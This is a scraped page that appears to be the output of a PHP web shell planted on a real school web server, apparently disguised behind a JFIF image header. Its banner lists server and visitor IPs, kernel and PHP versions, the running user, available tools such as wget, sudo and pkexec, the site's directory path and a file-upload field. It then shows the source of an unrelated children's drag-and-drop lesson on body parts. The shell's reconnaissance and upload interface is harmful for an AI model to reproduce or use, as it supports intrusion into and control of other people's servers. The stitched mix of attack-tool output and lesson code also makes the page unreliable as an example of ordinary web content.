????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.148.168.26 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelG/Category1/ |
Upload File : |
<!doctype html> <html> <head> <title>Vocabulary - identify body parts - 2</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.G, Category.No1); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.G, Category.No1, 31), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_headings = ['id_td_heading1']; var ids_boxes = ['id_dropbox_lungs', 'id_dropbox_skeleton', 'id_dropbox_skull', 'id_dropbox_toe', 'id_dropbox_waist']; var ids_tds_texts = new Array(); for (var textId = 1; textId <= 5; textId++) { ids_tds_texts.push('id_td_text' + textId); } var ids_tds = ['id_options1', 'id_td_skull', 'id_td_lungs', 'id_td_waist', 'id_td_toe', 'id_td_skeleton']; var ids_spans = ['id_span_skull', 'id_span_lungs', 'id_span_waist', 'id_span_toe', 'id_span_skeleton']; var ids_All = ids_headings.concat(ids_tds, ids_tds_texts, ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 70); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_spans); var id_tables_array = ['id_table1']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_dropbox_lungs', 'id_dropbox_skeleton', 'id_dropbox_skull', 'id_dropbox_toe', 'id_dropbox_waist']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } function btnHome_click() { shared_btnHomeCategories_click('LevelG'); } function btnPrevious_click() { window.location = 'LevelGCat1Lesson30.html'; } function btnNext_click() { window.location = 'LevelGCat1Lesson32.html'; } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0"> <tr> <td> <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0"> <tr height="5%"> <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent"><u>Vocabulary</u>:</td> </tr> <tr height="6%"> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td id="id_options1" class="shared_style_blue_24px_bold_padding_left_2_percent" width="*">Options:</td> <td id="id_td_skeleton" class="shared_style_red_24px_bold" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_skeleton">Skeleton</span> </td> <td id="id_td_lungs" class="shared_style_red_24px_bold" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_lungs">Lungs</span> </td> <td id="id_td_waist" class="shared_style_red_24px_bold" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_waist">Waist</span> </td> <td id="id_td_toe" class="shared_style_red_24px_bold" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_toe">Toe</span> </td> <td id="id_td_skull" class="shared_style_red_24px_bold" width="16%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_skull">Skull</span> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td style="padding-left:2%"> <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%"> <tr id="id_tr_dropbox_lungs" ondragover="shared_highlight('id_dropbox_lungs'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_lungs')" ondrop="DragDrop('id_dropbox_lungs', ['id_span_lungs'])"> <td id="id_td_text1" class="shared_style_black_24px_bold"> <span>1. This part of the body starts with "L". When we breathe in air, it goes into these (we have two of them). What are they? </span> <span id="id_dropbox_lungs" class="shared_style_red_24px_bold">__________</span> </td> </tr> <tr id="id_tr_dropbox_skeleton" ondragover="shared_highlight('id_dropbox_skeleton'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_skeleton')" ondrop="DragDrop('id_dropbox_skeleton', ['id_span_skeleton'])"> <td id="id_td_text2" class="shared_style_black_24px_bold"> <span>2. This word starts with "S". It is the framework of the bones in our body. What is it? </span> <span id="id_dropbox_skeleton" class="shared_style_red_24px_bold">__________</span> </td> </tr> <tr id="id_tr_dropbox_skull" ondragover="shared_highlight('id_dropbox_skull'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_skull')" ondrop="DragDrop('id_dropbox_skull', ['id_span_skull'])"> <td id="id_td_text3" class="shared_style_black_24px_bold"> <span>3. This word starts with "S". It is a bony part of the head which protects the brain. What is it? </span> <span id="id_dropbox_skull" class="shared_style_red_24px_bold">__________</span> </td> </tr> <tr id="id_tr_dropbox_toe" ondragover="shared_highlight('id_dropbox_toe'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_toe')" ondrop="DragDrop('id_dropbox_toe', ['id_span_toe'])"> <td id="id_td_text4" class="shared_style_black_24px_bold"> <span>4. This word starts with "T". It is one of the ten movable parts on the foot. What is it? </span> <span id="id_dropbox_toe" class="shared_style_red_24px_bold">__________</span> </td> </tr> <tr id="id_tr_dropbox_waist" ondragover="shared_highlight('id_dropbox_waist'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_dropbox_waist')" ondrop="DragDrop('id_dropbox_waist', ['id_span_waist'])"> <td id="id_td_text5" class="shared_style_black_24px_bold"> <span>5. This word starts with "W". It is the part of the body between hips and the chest. What is it called? </span> <span id="id_dropbox_waist" class="shared_style_red_24px_bold">__________</span> </td> </tr> <tr> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_skull', {handle : 'id_td_skull', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_lungs', {handle : 'id_td_lungs', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_waist', {handle : 'id_td_waist', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_toe', {handle : 'id_td_toe', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_skeleton', {handle : 'id_td_skeleton', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tr_dropbox_lungs', {onOver : function(){shared_highlight('id_dropbox_lungs')}, onOut : function(){shared_un_highlight('id_dropbox_lungs')}, onDrop : function(){DragDrop('id_dropbox_lungs', ['id_span_lungs'])}}); webkit_drop.add('id_tr_dropbox_toe', {onOver : function(){shared_highlight('id_dropbox_toe')}, onOut : function(){shared_un_highlight('id_dropbox_toe')}, onDrop : function(){DragDrop('id_dropbox_toe', ['id_span_toe'])}}); webkit_drop.add('id_tr_dropbox_waist', {onOver : function(){shared_highlight('id_dropbox_waist')}, onOut : function(){shared_un_highlight('id_dropbox_waist')}, onDrop : function(){DragDrop('id_dropbox_waist', ['id_span_waist'])}}); webkit_drop.add('id_tr_dropbox_skull', {onOver : function(){shared_highlight('id_dropbox_skull')}, onOut : function(){shared_un_highlight('id_dropbox_skull')}, onDrop : function(){DragDrop('id_dropbox_skull', ['id_span_skull'])}}); webkit_drop.add('id_tr_dropbox_skeleton', {onOver : function(){shared_highlight('id_dropbox_skeleton')}, onOut : function(){shared_un_highlight('id_dropbox_skeleton')}, onDrop : function(){DragDrop('id_dropbox_skeleton', ['id_span_skeleton'])}}); </script> </body> </html>